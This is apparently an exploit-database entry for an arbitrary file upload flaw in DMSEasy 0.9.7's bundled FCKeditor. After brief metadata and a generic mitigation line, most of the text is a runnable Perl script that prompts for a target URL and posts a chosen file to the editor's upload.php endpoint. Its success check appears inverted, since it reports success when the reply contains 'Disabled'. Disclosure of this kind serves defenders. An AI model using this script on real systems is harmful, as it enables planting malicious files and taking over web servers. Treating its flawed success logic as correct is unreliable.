DMSEasy0.9.7 (fckeditor) Arbitrary File Upload

vendor:

DMSEasy

by:

Anonymous

9,3

CVSS

HIGH

Arbitrary File Upload

434

CWE

Product Name: DMSEasy

Affected Version From: 0.9.7

Affected Version To: 0.9.7

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

DMSEasy0.9.7 (fckeditor) Arbitrary File Upload

DMSEasy0.9.7 is vulnerable to an arbitrary file upload vulnerability due to improper validation of user-supplied input. An attacker can exploit this vulnerability to upload malicious files to the web server and execute arbitrary code.

Mitigation:

Ensure that user-supplied input is properly validated and sanitized before being used in the application.

Source

Exploit-DB raw data:

#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
print <<INTRO;
+++++++++++++++++++++++++++++++++++++++++++++++++++++
+   DMSEasy0.9.7 (fckeditor) Arbitrary File Upload  +
+                                                   +
+++++++++++++++++++++++++++++++++++++++++++++++++++++
INTRO
print "Enter URL(ie: http://target.com): ";
    chomp(my $url=<STDIN>);
  
print "Enter File Path(path to local file to upload): ";
    chomp(my $file=<STDIN>);
my $ua = LWP::UserAgent->new;
my $re = $ua->request(POST $url.'/FCKeditor/editor/filemanager/upload/php/upload.php',
                      Content_Type => 'form-data',
                      Content      => [ NewFile => $file ] );
if($re->is_success) {
    if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; }
    else { print "File Upload Is Disabled! Failed!\n"; }
} else { print "HTTP Request Failed!\n"; }
exit;